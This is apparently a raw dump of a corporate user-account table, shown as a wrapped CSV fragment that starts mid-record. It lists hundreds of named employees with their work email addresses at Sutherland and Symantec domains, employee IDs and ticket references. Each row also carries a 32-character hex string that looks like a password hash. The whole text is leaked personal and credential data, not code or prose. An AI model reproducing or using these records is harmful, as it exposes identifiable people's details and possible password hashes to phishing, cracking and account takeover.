,591df105988403e0e69b0532d8a1fdaf,S,<blank>,Ramesh_S,Ramesh,NULL,NULL,NULL
44c-4e29-967b-41c0d8bc5557,<blank>,<blank>,RamyaDevi_K@SUTH.COM,Sutherland,2f409
e2c0c50f064aadf9378b0c8e9d6,Devi,<blank>,Ramya_Devi_K,Ramya,NULL,NULL,NULL
b40-43c4-bcd9-d6927d315ef5,<blank>,<blank>,Reshmi_R@SUTH.COM,Sutherland,583618af
edff92c75532b548fdd0f311,Chandran,<blank>,Reshmi_Chandran_R,Reshmi,NULL,NULL,NUL
L
f300-4237-849f-7539caeff3b5,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
606994 - PR - 27th March 2012,6ceebe5537e6f45f570a0121f396ad1f,Shrivastav,<blank
>,223110,Anandkumar ,NULL,NULL,NULL
4c5-4c28-aad2-d47375c7abec,<blank>,<blank>,RethuKumari_K@SUTH.COM,Sutherland,7a8
206693b743378efa7ba5df250e8f4,Kumari,<blank>,Rethu_Kumari_Kishore_Sharma,Rethu,N
ULL,NULL,NULL
b60f-4c41-bf1d-24fe213b2682,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
606997 - PR - 27th March 2012,ca1b7a1a44ff28cf5ec33456bc491e7c,Furniturewala,<bl
ank>,223111,Imran,NULL,NULL,NULL
ae5-43b7-b799-92e5c4607041,<blank>,<blank>,Revathi_D2@SUTH.COM,Sutherland,061ec2
057c1e0cfa460fe855b5475278,D,<blank>,Revathi_D,Revathi,NULL,NULL,NULL
fe7-4fd7-95a3-8b95a2ab03e2,<blank>,<blank>,Richlyn_Ferreira@SUTH.COM,Sutherland,
566fc0042a650e62610033a426562531,Jerome,<blank>,Richlyn_Jerome_Ferreira,Richlyn,
NULL,NULL,NULL
fdc-4f1a-a794-485d2d3f1707,<blank>,<blank>,Ritchu_Rajan@SUTH.COM,Sutherland,0e5a
5864f14bd46b05c6f8766a7dd372,Rajan,<blank>,Ritchu_Rajan,Ritchu,NULL,NULL,NULL
2c5-4b0c-93d9-0980bd7c22ed,<blank>,<blank>,Ritesh_Nair@suth.com,Sutherland,840a7
64ce9bdb668efb8a64e46515dbd,Damodharan,<blank>,Ritesh_Damodharan_Nair,Ritesh,NUL
L,NULL,NULL
659-43e5-b9a8-fe8a50aa719f,<blank>,<blank>,Ritesh_Pawar@SUTH.COM,Sutherland,3425
5af0c7fbb7f44acfe5d123077c8b,Rajendra,<blank>,Ritesh_Rajendra_Pawar,Ritesh,NULL,
NULL,NULL
44bf-4fcb-90b4-a4c2feba3382,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607000 - PR - 27th March 2012,98a786f21f070f9aab61b144e6fddab9,Acharya,<blank>,2
23112,Sagar,NULL,NULL,NULL
694-4dfc-85ee-5172be7f327b,<blank>,<blank>,RituDhankhar_R@SUTH.COM,Sutherland,17
6c7895268a15694cb617305bd843b5,Dhankhar,<blank>,Ritu_Dhankhar_R,Ritu,NULL,NULL,N
ULL
54e-4cdc-adf1-53e837b71d43,<blank>,<blank>,Riyad_R@SUTH.COM,Sutherland,03a852080
6cebd23c95b24e355c507fb,M,<blank>,Riyad_M_R,Riyad,NULL,NULL,NULL
5b6-4e42-80aa-8c45383e02c6,<blank>,<blank>,Riyas_Salim@SUTH.COM,Sutherland,6c94b
30b5e9c54f443806df2775eb81c,Salim,<blank>,Riyas_Salim,Riyas,NULL,NULL,NULL
365-40df-b7c9-cead5cd94425,<blank>,<blank>,riyaz_pattan@suth.com,Sutherland,8cf5
c53a19195d3b9bc9eebf3df16847,Khan,<blank>,Riyaz_Khan_Pattan,Riyaz,NULL,NULL,NULL
35e-4da5-9aa3-f5c1ab91b799,<blank>,<blank>,Rizwan_Shaikh@SUTH.COM,Sutherland,0eb
80831e49ab69dc3b92f3688c8446a,Mohammed,<blank>,Rizwan_Mohammed_Shaikh,Rizwan,NUL
L,NULL,NULL
30e-4ad9-8705-30369e3f6466,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,e
96379abcb12a27a6cb9008b74fbdc43,User,<blank>,test_user,Test,NULL,NULL,NULL
f35-462c-abef-556ccc6f2f6f,<blank>,<blank>,Ronald_H@suth.com,Sutherland,e9180564
5851d828a255284b4f3e7df3,Hilbert,<blank>,Ronald_Hilbert,Ronald,NULL,NULL,NULL
fef-438f-b570-09192d9dc06b,<blank>,<blank>,RonaldMichael_MA@SUTH.COM,Sutherland,
fd4fa0c01db8811e98807279db8ba519,Michael,<blank>,Ronald_Michael_M_A,Ronald,NULL,
NULL,NULL
981-4e5c-a794-394162cb0934,<blank>,<blank>,Rony_Dharampuriwala@SUTH.COM,Sutherla
nd,bf4f61cd5fc5cc35aa771747920d659e,Pesi,<blank>,Rony_Pesi_Dharampuriwala,Rony,N
ULL,NULL,NULL
f4d-44bf-b7a5-699c567d2f7f,<blank>,EMPROV,symaccount@clts.com,CLTS,55f4c0e3df35e
37145b89e900aedac4e,Jiang,<blank>,088841,Cong,NULL,NULL,NULL
9a1-4d56-bfab-c201a6715f4f,<blank>,<blank>,RoselineMartina_Sequeira@SUTH.COM,Sut
herland,76c65a02d0dd266f2c3a0a8bcda61b6f,Martina,<blank>,Roseline_Martina_Sequei
ra,Roseline,NULL,NULL,NULL
c325-4ddd-b3b4-ff6f23439d70,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,Sutherland,860b628a27cb1cb40e9d61b6a447bb21,Palma,<blank>,093240,Angelyn M
ae,NULL,NULL,NULL
f96-443d-bad4-8d6880b8f367,<blank>,<blank>,Roshan_Dsouza@SUTH.COM,Sutherland,ec4
7969c068aac0945c1649d475e1eba,Dsouza,<blank>,Roshan_Dsouza,Roshan,NULL,NULL,NULL
49c-45f6-8a72-4d17e679653d,<blank>,<blank>,Roshith_Kumar@SUTH.COM,Sutherland,9c6
b4c4e464e586b928bf7e41b688e32,Ravi,<blank>,Roshith_Ravi_Kumar,Roshith,NULL,NULL,
NULL
c80-47bb-ab0e-ce423e907459,<blank>,<blank>,Rosy_Puri@SUTH.COM,Sutherland,24dd518
313d5fa316b2c3de4275f78b8,Puri,<blank>,Rosy_Puri,Rosy,NULL,NULL,NULL
be2-49b4-afe2-ee100bd126f6,<blank>,<blank>,Roy_Chalissery@SUTH.COM,Sutherland,d6
bc8d5de006d9528b10dcca87853117,Chalissery,<blank>,Roy_Chalissery,Roy,NULL,NULL,N
ULL
b49-42b3-b80b-4c23fad15fc8,<blank>,<blank>,SabihaAnjum_J@SUTH.COM,Sutherland,bf5
69a4379fe2b924d7416bb36114eae,Anjum,<blank>,Sabiha_Anjum_J,Sabiha,NULL,NULL,NULL
83bc-437b-ae1a-74b3935a969e,"CRQ000000682589 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,fd681d41a5e060542eee37aa3a1edffa,Prajapati,<b
lank>,226239,Rohit,NULL,NULL,NULL
0e8a-43ee-a900-e1920bf27835,"RJ-Nov 22, 2010",<blank>,Padmini_Murthy@symantec.co
m,<blank>,e4bcd66f60ef8d5e85690a5cd7c178d5,Murthy,<blank>,107023,Padmini,NULL,NU
LL,NULL
b44-4ba2-8ccf-aae374ecb7f3,<blank>,<blank>,RaniJayashree_R@SUTH.COM,Sutherland,8
47827813231bb9dbd9457c8c04a9373,Jayashree,<blank>,Rani_Jayashree_R,Rani,NULL,NUL
L,NULL
1930-4111-a81f-6bd53f2fc3e1,"CRQ000000682595 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,a88ca8f80b02066a0b3c5f161a06ce90,Kunwar,<blan
k>,226242,Karan,NULL,NULL,NULL
2660-459a-aa22-e672069caa0e,CRQ000000444044 SP Dec 8 2011,000-0000,tools_id@syma
ntec.suth.com,Sutherland,a227697a3228d7b71bd9dfebba164496,Ortiz,<blank>,122828,R
amon Pantujan,NULL,NULL,NULL
88f-4d80-9833-a8cab5c2d7ff,<blank>,<blank>,ravindra_jha@symantec.suth.com,Suther
land,72b9365e39b650152f27ef66704078ba,Satish,<blank>,Ravindra_Satish_Jha,Ravindr
a,NULL,NULL,NULL
450-4c26-bd46-5b9e5b3817de,<blank>,<blank>,Ravindra_Rajput@suth.com,Sutherland,9
83c09ed497f1a61a4666983e156fd88,Shyam,<blank>,Ravindra_Shyam_Rajput,Ravindra,NUL
L,NULL,NULL
1e5-45ad-b718-37ab1f5b77c6,<blank>,<blank>,Raviraj_Bhat@SUTH.COM,Sutherland,e2e8
c57193c44bca5c118361a1b4b8db,Shankar,<blank>,Raviraj_Shankar_Bhat,Raviraj,NULL,N
ULL,NULL
c2cb-4a5a-8774-80b5a0451095,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
208265 - PR - 2/25/2011,f69aab2b7eae02549de2ebfab22930f9,Veeramani,<blank>,11340
6,Keerthika,NULL,NULL,NULL
122-4ef3-b28f-0755ec897512,<blank>,<blank>,Rekha_Raheja@SUTH.COM,Sutherland,458c
0eb7389b405a1a57481a9a7cbe02,Jagdish,<blank>,Rekha_Jagdish_Raheja,Rekha,NULL,NUL
L,NULL
fbb-4c8f-b4a7-50fe3222c87d,<blank>,<blank>,Relji_Joseph@SUTH.COM,Sutherland,89a7
0dd56cb3bbc5ef28102a21c2c675,John,<blank>,Relji_John_Joseph,Relji,NULL,NULL,NULL
98c-4b4e-a369-97139a3e9ec2,<blank>,<blank>,RemyaMohan_Nair@SUTH.COM,Sutherland,9
dac11a1a1edd05f3935867fc3ce6144,Mohan,<blank>,Remya_Mohan_Nair,Remya,NULL,NULL,N
ULL
b51-4ef2-b00b-b95c25f9b225,<blank>,<blank>,Renjith_Madhavan@suth.com,Sutherland,
d643e612a628afe5fc3543c003aee22e,Kumar,<blank>,Renjith_Kumar_Madhavan,Renjith,NU
LL,NULL,NULL
7bb5-4f27-84c2-65180e931911,CRQ000000598554--vmd--21/03/2012,000-000,alesiamarie
_silva@Suth.com,Sutherland,0624ab46468f2575eca861d88e38486e,Silva,<blank>,222541
,AlesiaMarie,NULL,NULL,NULL
fd7-49f1-86e8-3b2375f789ab,<blank>,<blank>,Rohan_Jollani@SUTH.COM,Sutherland,8a5
083d303412e5e6a02c2e8d1e92d08,Ramesh,<blank>,Rohan_Ramesh_Jollani,Rohan,NULL,NUL
L,NULL
173c-4686-bdb5-239201d9a282,"CRQ000000829989 CLNP Oct 08,2012",000-0000,michelle
_lising@symantec.com,Symantec,941ef2153a917afaaaf8e9e23bf18044,Lising,<blank>,23
0586,Michelle,NULL,NULL,NULL
65c-46a5-a930-ca50a6f11802,<blank>,<blank>,Rohit_Bhagat@SUTH.COM,Sutherland,9c55
cb0a9ad70a09b4b3ab2a686c28f4,Anil,<blank>,Rohit_Anil_Bhagat,Rohit,NULL,NULL,NULL
de8a-4305-9178-69c1d3513ff2,CRQ000000273424--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,1e6b998a31e3339e2ca3f0e0efd23098,S,<blank>,116967,Sai
girish,NULL,NULL,NULL
944-4b98-8d06-3da1a29097e1,<blank>,<blank>,M_Suresh@SUTH.COM,Sutherland,6acb28ee
ddc8e86555bae01b466b3079,Suresh,<blank>,Rohith_Suresh_M,Rohith,NULL,NULL,NULL
174-4820-aaea-b9325dee3121,<blank>,<blank>,Rojas_J@SUTH.COM,Sutherland,51e0d7398
49f913b41391316bd9b6135,J,<blank>,Rojas_J,Rojas,NULL,NULL,NULL
08a-463f-9d30-2031f8bf957d,<blank>,<blank>,grolla@suth.com,Sutherland,894157f6a1
dbaab8cd77f87400ec7220,Patrick,<blank>,Rolland_Patrick_Gomes,Rolland,NULL,NULL,N
ULL
92e-484e-bec9-f481605ed42b,<blank>,<blank>,Romin_DSouza@SUTH.COM,Sutherland,99bf
352fa4637fe33ccff0d7ca050f13,D'Souza,<blank>,Romin_DSouza,Romin,NULL,NULL,NULL
5a6-4b9d-af88-77d4bbc1df6d,<blank>,<blank>,Roy_Kalyani@SUTH.COM,Sutherland,de5cc
e987a53e6aa9c3c789f3835945d,Kalyani,<blank>,Roy_Kalyani,Roy,NULL,NULL,NULL
d9d-48f9-a1e6-617656bdbe2e,<blank>,<blank>,Rubaganesh_S@SUTH.COM,Sutherland,db61
d03691e7f414e6ea8db1b1d735bf,S,<blank>,Rubaganesh_S,Rubaganesh,NULL,NULL,NULL
24c-4b1d-be1f-b4a2b1158b52,<blank>,<blank>,RufusAnthony_R@suth.com,Sutherland,9f
57fe891a5e29fb7ac3ceb41ab55a3c,Anthony,<blank>,Rufus_Anthony_Rodrigues,Rufus,NUL
L,NULL,NULL
f8e-4425-a6ea-7bd831a1290f,<blank>,<blank>,RunaMedhi_B@SUTH.COM,Sutherland,9bfdf
f721d41a1d433a8d0cd6bea0703,Medhi,<blank>,Runa_Medhi_B,Runa,NULL,NULL,NULL
c43-470a-b309-2da7cb1fd97a,<blank>,<blank>,Rupa_R@suth.com,Sutherland,c01a0be04e
db8bdfaba94044920f1b76,Rajan,<blank>,Rupa_Rajan_Rajendran,Rupa,NULL,NULL,NULL
a38-4352-9995-f4c2e18e857b,<blank>,<blank>,RichardWilliam_W@SUTH.COM,Sutherland,
99c068e911c28b9e5bd309bc36de14c8,William,<blank>,Richard_William_W,Richard,NULL,
NULL,NULL
349-447e-a86d-5f33231310e7,<blank>,<blank>,Richards_D_Silva@SUTH.COM,Sutherland,
8290e803648c1711766b77d6c4f9f1c7,D'Silva,<blank>,Richards_D_Silva,Richards,NULL,
NULL,NULL
6fa4-4491-8d17-6163f3141d69,<blank>,<blank>,CenzicProd_User@symantec.com,<blank>
,9ab63b6cc9fab84409b20e1c2c206e67,User,<blank>,CenzicProd_User,CenzicProd,NULL,N
ULL,NULL
9126-4ca8-a4ab-1d56dd71971d,CRQ000000367352-CLNP-21/10/2011,000-0000,orion_spron
ck@teleperformance.nl,Teleperformance,7e131c59cba2dab16e024ce295cffa64,Spronck,<
blank>,121613,Orion,NULL,NULL,NULL
68a0-47e2-aacf-27644c945d18,CRQ000000321882--VMD--17/08/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,2f3c68c1fcad287455f94ae29bfa0fe5,A K,<blank>,119611,C
handrasekar,NULL,NULL,NULL
aa9-4f42-99d3-e6fe0fc90061,<blank>,<blank>,Sagar_Karande@SUTH.COM,Sutherland,1ca
dfcada0efa8e1dc9714c767c18a87,Ramchandra,<blank>,Sagar_Ramchandra_Karande,Sagar,
NULL,NULL,NULL
9c9d-4eb8-ae57-1fe4e2d48d8b,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716123,0e0c81093c021c06cd222f18296834f6,Berallo,<blank>,227435,Ailleen Grace ,NU
LL,NULL,NULL
6e3a-4216-8fda-f33d23b75cb2,CRQ000000261093,<blank>,tools_id@symantecsuth.com,"M
ay 19,2011 SP",cb29fd12df151fac3f36e0792f94381e,Gewali,<blank>,115817,Ranjan,NUL
L,NULL,NULL
f6a-4095-8205-fa27e85d3eb3,<blank>,<blank>,Sagar_Parulekar@SUTH.COM,Sutherland,5
2d64c51466d7460cb8915108ce0d80c,Sudhir,<blank>,Sagar_Sudhir_Parulekar,Sagar,NULL
,NULL,NULL
889-4554-a208-358a1a9f8e36,<blank>,<blank>,Sahil_Shah@SUTH.COM,Sutherland,54a5f2
6154f63eb54929d3bcedaecd8d,Mahendra,<blank>,Sahil_Mahendra_Shah,Sahil,NULL,NULL,
NULL
1ef-4d44-9bbf-21516ec5145a,<blank>,<blank>,DCSanil@suth.com,Sutherland,500ad7738
3a870d36d8288e9ac593a82,Shersingh,<blank>,Sahil_Shersingh_Varma,Sahil,NULL,NULL,
NULL
14d-4b58-aee7-a09031830936,<blank>,<blank>,Sajeena_Janardhanan@SUTH.COM,Sutherla
nd,481a8bae10a2c922986945ee444e0170,M,<blank>,Sajeena_M_Janardhanan,Sajeena,NULL
,NULL,NULL
ca5-43ef-b044-bc996e274480,<blank>,<blank>,Sajeesh_K.B@SUTH.COM,Sutherland,89eb6
ba685b67d14ef497284405ecd35,K.B,<blank>,Sajeesh_K.B,Sajeesh,NULL,NULL,NULL
e59-4edf-9e7e-2c1ce1613e3f,<blank>,2633284,tools_id@symantec.suth.com,Sutherland
,c2af87d9077fb64ad3820c8ad6d16316,Abdul,<blank>,Sajid_Abdul_Latif_Qureshi,Sajid,
NULL,NULL,NULL
0bd-4fa1-8191-a8e206fe1a0f,<blank>,<blank>,Sajid_Husain@SUTH.COM,Sutherland,6ff7
fbb1e7b683b74781626769dccc09,Husain,<blank>,Sajid_Husain,Sajid,NULL,NULL,NULL
a349-4e38-ab60-e968c130ce6b,"CRQ000000829999 CLNP Oct 08,2012",000-0000,michaelj
ohn_bagunu@symantec.com,Symantec,2516e862f29b6f99cf217ca613307f73,Bagunu,<blank>
,230592,Michael John,NULL,NULL,NULL
5393-48eb-b8b3-c3441ea90bca,<blank>,<blank>,rafael_cunanan@SPI.COM,PM - 8/28/201
2 - CRQ000000783699,6d21b74cdc28da6db244b4697b787b83,Cunanan,<blank>,229457,Rafa
el,NULL,NULL,NULL
6a2-4a56-ad84-11cfacf7dd3b,<blank>,<blank>,SajinSiyaj_S@symantec.suth.com,Suther
land,505f107c607fa99569e1712f9eceb7aa,Siyaj,<blank>,Sajin_Siyaj_S,Sajin,NULL,NUL
L,NULL
a5f-49fd-baab-0f0fa6be9876,<blank>,<blank>,Sajith_VS@SUTH.COM,Sutherland,0fcfaf2
4c7949be9c1181b75b9023fdb,Devan,<blank>,Sajith_Devan_V_S,Sajith,NULL,NULL,NULL
452-4234-91c5-383b7cd99f62,<blank>,<blank>,Sambavi_G@SUTH.COM,Sutherland,1d51845
f64fc1e6c74349ef9566a92ee,G,<blank>,Sambavi_G,Sambavi,NULL,NULL,NULL
287-43f6-809c-ba33ccde2505,<blank>,<blank>,sameer_shaikh@suth.com,Sutherland,664
dc1db3604ccb56bcd53b53f4659fa,Shabbir,<blank>,Sameer_Shabbir_Shaikh,Sameer,NULL,
NULL,NULL
5ab-414e-bfc3-7ff2fe972a68,<blank>,<blank>,AMSamir1@suth.com,Sutherland,0b68465d
aaee57fb8339209ba3cc52a1,Martin,<blank>,Samir_Martin_Alvares,Samir,NULL,NULL,NUL
L
f76-4f9c-aefc-03d041b508cd,<blank>,<blank>,Samira_Aswekar1@SUTH.COM,Sutherland,7
70afed38c6244feac357b24cc6041d2,Aswekar,<blank>,Samira_Aswekar,Samira,NULL,NULL,
NULL
97d-4090-ad39-44f5e9610480,<blank>,<blank>,SamiullaAbdulSattar_Shaikh@SUTH.COM,S
utherland,8095c1667be1142d71d7d4a3e5e28e99,Abdul,<blank>,Samiulla_Abdul_Sattar_S
haikh,Samiulla,NULL,NULL,NULL
289b-4195-ae60-06c0c3e39739,<blank>,<blank>,jeffrey_altura@SPI.COM,<blank>,a2ef1
bf6d8769966123e9544d767d524,Altura,<blank>,229458,Jeffrey,NULL,NULL,NULL
871-49bf-aa2b-27b0379c8a85,<blank>,<blank>,Samrat_Tiwari@SUTH.COM,Sutherland,760
1e6a7e10436e6bb6c0c27079f607e,Babulnath,<blank>,Samrat_Babulnath_Tiwari,Samrat,N
ULL,NULL,NULL
a32-4b90-beca-18bed583ab0c,<blank>,<blank>,Sanal_N@SUTH.COM,Sutherland,e0fd0ac9f
a18387ea33a8b317895c155,N,<blank>,Sanal_N,Sanal,NULL,NULL,NULL
18c-44a8-a2ef-730e05528f5b,<blank>,<blank>,Sanal_Soman@SUTH.COM,Sutherland,2ec81
e6b212368bcd497be9a3528f4b8,P,<blank>,Sanal_P_Soman,Sanal,NULL,NULL,NULL
0e3-4882-9d64-23f24fb5e70c,<blank>,<blank>,Sandeep_Francis@SUTH.COM,Sutherland,e
7867ae093c192b755b8c9ac5fa544a3,Francis,<blank>,Sandeep_Francis,Sandeep,NULL,NUL
L,NULL
832-4975-a358-058899a0f4d4,<blank>,<blank>,Robin_Thomas@SUTH.COM,Sutherland,0d69
87470f188b0a94497499f6f2987b,Thomas,<blank>,Robin_Thomas,Robin,NULL,NULL,NULL
fe4-41bc-8304-6d042c81985e,<blank>,<blank>,Rocky_Vaz@SUTH.COM,Sutherland,f6b6daf
d39da0880f254ed75689c636f,Benedict,<blank>,Rocky_Benedict_Vaz,Rocky,NULL,NULL,NU
LL
d50-4e3b-ab22-cec3de265e5e,25/03/2010 - SPJ,INC000000139257,Suchit_Tripathy@syma
ntec.com,Symantec,7739409fd3c859f38f47c42a1ba50bea,Cooke,<blank>,092723,Veronica
,NULL,NULL,NULL
89f-4b55-937e-21b9720f45ba,<blank>,<blank>,SaiKrishna_Ellarboina@SUTH.COM,Suther
land,c3d67370271a3fcedc004b6322b25ebb,Krishna,<blank>,Sai_Krishna_Ellaboina,Sai,
NULL,NULL,NULL
a50c-40ad-8f73-21de13e923ea,CRQ000000439619-CLNP Dec 06 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,332d8679ecbb2ad09defd217e9d95c8a,Emberga,<blank>,122
808,Lendy Alvior,NULL,NULL,NULL
a90-4f56-9a26-6df952f744f6,<blank>,<blank>,Saiju_Rajan@SUTH.COM,Sutherland,9048c
96a2c36030b14cee9e4e9fcb403,Chandrika,<blank>,Saiju_Chandrika_Rajan,Saiju,NULL,N
ULL,NULL
a02f-440d-8443-cd277e5d34fe,"CRQ000000682592 CLNP June 04,2012",999-999-9999,too
ls_id@symantec.suth.com,Sutherland,d4cf1ddfe70361e931355c4cbf6a6949,Chunawala,<b
lank>,226241,Juned,NULL,NULL,NULL
4cd-42ac-858c-eb968cac4bd3,<blank>,<blank>,Sajan_Kuriakose@SUTH.COM,Sutherland,0
1bba0decd8af0ddfea075a77c1d3f8a,Joy,<blank>,Sajan_Joy_Kuriakose,Sajan,NULL,NULL,
NULL
557-4f87-b472-228fcf89aefe,<blank>,<blank>,Saju_J@SUTH.COM,Sutherland,75a7f9daf8
6561f61b8da58039cb7041,J,<blank>,Saju_J,Saju,NULL,NULL,NULL
6d7-4b16-9d51-246f0961f87a,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,c
890cde5c852017d8529a3b5bdf1e6bd,User,<blank>,test_user1,Test,NULL,NULL,NULL
e22-4f59-8375-a1c1ff08252c,<blank>,<blank>,kevin_kerwien@symantec.com,Symantec,8
985a6f610ca315cbc9eac99970c5a34,User,<blank>,test_user2,Test,NULL,NULL,NULL
99d-44d9-843e-962aa854e05b,<blank>,<blank>,Sandeep_G@SUTH.COM,Sutherland,ece0ffb
af47aabbe0a84ef17702a88f9,Kumar,<blank>,Sandeep_Kumar_Gopala_Krishnan,Sandeep,NU
LL,NULL,NULL
88c-4583-b50c-782e1750aa73,<blank>,<blank>,Sandeep_Prem@SUTH.COM,Sutherland,67b2
6f8023181a39a0ce16e98846d168,Prem,<blank>,Sandeep_Prem,Sandeep,NULL,NULL,NULL
d27-4677-9873-8ce78b8186dd,<blank>,2633282,tools_id@symantec.suth.com,Sutherland
,f08bf28cdce7feb830df598a2a5360f8,Rajkumar,<blank>,Sandeep_Rajkumar_Gupta,Sandee
p,NULL,NULL,NULL
d77-44ce-bca1-afca68eab7c8,<blank>,<blank>,Sandeep_Kumar1@SUTH.COM,Sutherland,b6
e23b9b8897c9f8129b0fbb78d54410,S,<blank>,Sandeep_S_Kumar,Sandeep,NULL,NULL,NULL
136-4237-8e2c-cc38d638ced0,<blank>,<blank>,Sandeep_Subramanian@SUTH.COM,Sutherla
nd,aa7de3c2be2b64b7cdfed6aece90c52d,Subramanian,<blank>,Sandeep_Subramanian,Sand
eep,NULL,NULL,NULL
29d-4b3a-91fa-f1f0041634d0,<blank>,<blank>,SandeepT_A@SUTH.COM,Sutherland,9a493e
589a005ce20ef63ecc28cad3c8,T,<blank>,Sandeep_T_A,Sandeep,NULL,NULL,NULL
dbe-4d2d-94f8-1a6a61bef30a,<blank>,<blank>,SandeshMallikarjun_Jelinder@SUTH.COM,
Sutherland,3f161752843dd407e9f459618569f837,Mallikarjun,<blank>,Sandesh_Mallikar
jun_Jelinder,Sandesh,NULL,NULL,NULL
635-47de-8e76-e9b5ea4dc7e5,<blank>,<blank>,Sandhya_Subramaniam@SUTH.COM,Sutherla
nd,17cd57a5ff7e9ef886205a904d8878c1,Subramaniam,<blank>,Sandhya_Subramaniam,Sand
hya,NULL,NULL,NULL
0ec-4b64-b9c0-8a41408e4f66,<blank>,<blank>,Sandiya_C@SUTH.COM,Sutherland,e0fd710
74fdd7eaaa7b6b26287c979ea,C,<blank>,Sandiya_C,Sandiya,NULL,NULL,NULL
27b-4e8e-9566-052bfc8aa1b2,<blank>,<blank>,Sangeeta_Rajbhar@SUTH.COM,Sutherland,
b110101cab2284d253cb793e663b1ac5,Rajbhar,<blank>,Sangeeta_Rajbhar,Sangeeta,NULL,
NULL,NULL
db0-41d4-aff2-f46589ba6706,<blank>,<blank>,Sangeeta_Kulkarni@SUTH.COM,Sutherland
,fa63ccde12479657e933b9f3227028bb,Vaman,<blank>,Sangeeta_Vaman_Kulkarni,Sangeeta
,NULL,NULL,NULL
90e-4a90-b55f-80fafb33bcd9,<blank>,<blank>,Sangeetha_GP@SUTH.COM,Sutherland,beb6
0161fa85d4689864a91ceaef0100,G,<blank>,Sangeetha_G_P,Sangeetha,NULL,NULL,NULL
9b7-45e9-bc45-fc8875fdd934,<blank>,<blank>,Sangeetha_R@SUTH.COM,Sutherland,d19de
08884fabbae1438d1b0d006a59d,R,<blank>,Sangeetha_R,Sangeetha,NULL,NULL,NULL
0c0-4e86-af99-fe0f6b0bf26a,<blank>,<blank>,Sanil_Venugopal@SUTH.COM,Sutherland,c
f5f748b4bfc735745f6105e674ac710,K,<blank>,Sanil_K_Venugopal,Sanil,NULL,NULL,NULL
7c1-4b14-818c-de68f1d9e727,<blank>,<blank>,Sanith_VN@SUTH.COM,Sutherland,3be02ca
846d4cf8d595e79f674be267e,V,<blank>,Sanith_V_N,Sanith,NULL,NULL,NULL
6d6-4bb2-bc07-2f60c670d1b6,<blank>,<blank>,Sanjai_T@suth.com,Sutherland,105cb59b
4f418f0497ba6d1e5d56bbfc,Ram,<blank>,Sanjai_Ram_Thirugnanam,Sanjai,NULL,NULL,NUL
L
7e1-483b-a869-280dbdf0834b,<blank>,<blank>,Sanjay_Khanna@SUTH.COM,Sutherland,744
b983d887a1b68352df49fb16dc092,Bhimsen,<blank>,Sanjay_Bhimsen_Khanna,Sanjay,NULL,
NULL,NULL
db9-478b-a536-51f8e70198e4,<blank>,<blank>,tsanjay@suth.com,Sutherland,dd8fd601a
06cc7a4e822bb01343ceeed,Thakre,<blank>,Sanjay_Thakre,Sanjay,NULL,NULL,NULL
179-4239-907d-97359d6c22d2,<blank>,<blank>,Safeeja_AR@SUTH.COM,Sutherland,caa487
b162fc3875e2b8423558d55e59,A,<blank>,Safeeja_A_R,Safeeja,NULL,NULL,NULL
824-4d01-88c3-36cdbb5c8880,<blank>,<blank>,SajuBenitus_T@SUTH.COM,Sutherland,539
e5acce27a6a4b8ffc4f7b07585116,Benitus,<blank>,Saju_Benitus_T,Saju,NULL,NULL,NULL
c18e-4e39-a588-e1501316325f,CRQ000000653480 SP 8 May 2012,000-0000,neeraj_khatod
@symantec.suth.com,Sutherland,723fa9134a243acdd0df3efd452410c8,Khatod,<blank>,22
4434,Neeraj,NULL,NULL,NULL
295-4afc-8d6a-b568648c97c3,<blank>,<blank>,Sanjeev_Padmanabhan@SUTH.COM,Sutherla
nd,27b2db871ac413fa357bf198f3ac6352,Padmanabhan,<blank>,Sanjeev_Padmanabhan,Sanj
eev,NULL,NULL,NULL
679-4beb-87a3-188b5809c639,<blank>,<blank>,Sanjiv_Darangia@suth.com,Sutherland,8
e84115ab014ecc9170e0bbafb80b91b,Kumar,<blank>,Sanjiv_Kumar_Darangia,Sanjiv,NULL,
NULL,NULL
44a-422c-8f57-b909b95a59c3,<blank>,<blank>,Sanket_Ranjit@SUTH.COM,Sutherland,803
27dac86a236531f2dd0ee7e7d45a2,Deepak,<blank>,Sanket_Deepak_Ranjit,Sanket,NULL,NU
LL,NULL
4e3-4964-90bf-e1f076e00d23,<blank>,<blank>,v-6sbane@suth.com,Sutherland,392c8aa4
d914c9dde3f03f3d339f4f8e,Banerjee,<blank>,Santanu_Banerjee,Santanu,NULL,NULL,NUL
L
9a14-49df-9105-97b380138d4b,"CRQ000000669857 CLNP May 23,2012",000-000-000,tools
_id@symantec.suth.com,Sutherland,e0a1ee3b21a60bfb82c98a35505b6e2a,Jethwani,<blan
k>,225897,Yashwant,NULL,NULL,NULL
d37-4b72-a580-b5446744aae7,<blank>,<blank>,Santhosh_J1@SUTH.COM,Sutherland,ae023
6a134bbfaf21a5dfba243dda9a2,J,<blank>,Santhosh_J,Santhosh,NULL,NULL,NULL
ebcb-440b-b50a-7d44ed954abc,<blank>,<blank>,suresh_sukheja@SUTH.COM,PM - 2/20/20
12 - CRQ000000560503,7de1182f520caa2935646c4a9a98746f,Sukheja,<blank>,125036,Sur
esh,NULL,NULL,NULL
cdd3-463b-9fbb-d2eaae2a4cbe,<blank>,<blank>,vaclav_filipek@symantec.com,Symantec
,3c1b2baa367b9d4e88e8757ccecc308c,Filipek,<blank>,vaclav_filipek,Vaclav,NULL,NUL
L,NULL
9895-4819-b129-bd4fc6d80db8,bpr-27-05-10,INC182175,tools_id@symantec.suth.com,su
therland,c970b819b898112feb552f7e03b9d73d,Solis,<blank>,095036,Jade,NULL,NULL,NU
LL
fae-4c42-88ef-327ed1572cf4,<blank>,<blank>,Santhosh_Varkey@SUTH.COM,Sutherland,3
7fad029f2b9db4e37914a50a5a94892,Varkey,<blank>,Santhosh_Varkey,Santhosh,NULL,NUL
L,NULL
5da9-43c7-b493-eec534a86408,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
